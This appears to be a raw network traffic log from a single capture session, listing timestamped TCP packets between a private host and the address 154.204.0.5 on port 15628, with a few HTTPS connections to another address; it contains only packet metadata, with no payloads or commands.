Jul 20, 2024 16:31:16.212054968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.216900110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.216950893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.221864939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.221916914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.226927042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.226979971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.231926918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.231986046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.236917973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.236968040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.241947889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.247590065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.252600908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.329813004 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:16.329890013 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:16.339930058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.346419096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.496401072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.501621962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.513498068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.623677969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.644613028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.667931080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.690001965 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.715677977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.729553938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.755002022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.779422045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.803714037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.824836016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.847456932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.869883060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.892416000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.905316114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.905394077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.905422926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.905422926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.906421900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.906927109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.906999111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.907032967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.907047987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.907583952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.907612085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.907639027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.907812119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.908018112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908140898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.908222914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908435106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908463001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908618927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.908832073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908859015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908885956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908912897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.908938885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.909776926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.909804106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.909832001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.909965992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.911094904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.911254883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.912070036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.912213087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.912781954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.912873030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.913397074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.913499117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.913536072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.913647890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.914767027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.914854050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.916666985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.916779995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.917056084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.917290926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.917733908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.918407917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.918556929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.918561935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.919694901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.919974089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.921760082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.921925068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.922213078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.922465086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.923413038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.923686028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.924917936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.925133944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.926913977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.927211046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.927421093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.927795887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.929143906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.929874897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.930006027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.930190086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.932090044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.932877064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.932980061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.934814930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.935391903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.935399055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.935600042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.937844992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.939810991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.940223932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.940499067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.944932938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.948189974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.953207970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.955854893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.960880041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.961199045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.966047049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.966202974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.971091986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.971209049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.976052999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.976305008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.981184006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.984226942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.989175081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.989389896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:16.994230032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:16.995810032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.000981092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.004358053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.009350061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.012142897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.017591000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.020370007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.025296926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.027942896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.032988071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.033155918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.038213015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.038408041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.043519974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.043824911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.048835993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.049067974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.053982019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.054075003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.058974028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.059250116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.064058065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.064291000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.069406033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.069775105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.074717045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.074893951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.079910994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.080889940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.086129904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.086376905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.091283083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.092458010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.097593069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.097851992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.103121996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.104365110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.109245062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.110258102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.130574942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.130870104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.136104107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.136260986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.141145945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.141392946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.146373034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.146665096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.151918888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.161132097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.166304111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.166467905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.171386003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.171664953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.176604033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.177349091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.182379007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.182471037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.188025951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.189095974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.194174051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.194405079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.199461937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.199575901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.204468966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.204689026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.210774899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.210901976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.215809107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.216042995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.220978975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.221890926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.226855040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.226980925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.233650923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.233805895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.238661051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.238821030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.244008064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.244311094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.249324083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.249490976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.254451990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.254802942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.259864092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.260117054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.265396118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.265779018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.270674944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.272499084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.277682066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.278502941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.283827066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.283987999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.288918972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.291656017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.297518969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.300210953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.305113077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.307704926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.312627077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.316219091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.321597099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.323669910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.329258919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.332225084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.337799072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.337883949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.351145983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.351265907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.356230021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.360038042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.365725994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.365797043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.370723009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.371582031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.377314091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.377398968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.382225990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.382293940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.387322903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.387482882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.392587900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.392667055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.397716999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.397789955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.402827024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.403541088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.408591032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.408814907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.413672924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.413841009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.418797016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.418876886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.423767090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.423846006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.428823948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.429867983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.434783936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.434851885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.439722061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.439789057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.444649935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.444706917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.449810982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.449872971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.455116987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.455171108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.460572004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.460716009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.465568066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.465620041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.485797882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.485856056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.490729094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.490781069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.495740891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.495791912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.501647949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.501698971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.507467031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.507522106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.512553930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.512604952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.518033028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.518085957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.523077965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.523139000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.528120041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.528170109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.533001900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.533058882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.541243076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.541301966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.546119928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.546178102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.551136017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.551188946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.556812048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.556868076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.557584047 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:17.557610035 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:17.562407017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.562463999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.567503929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.567564011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.572837114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.572891951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.577756882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.577806950 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.583221912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.583276033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.588300943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.588354111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.595964909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.596021891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.601223946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:17.601315975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:17.606693029 CEST	15628	49722	154.204.0.5	192.168.2.6
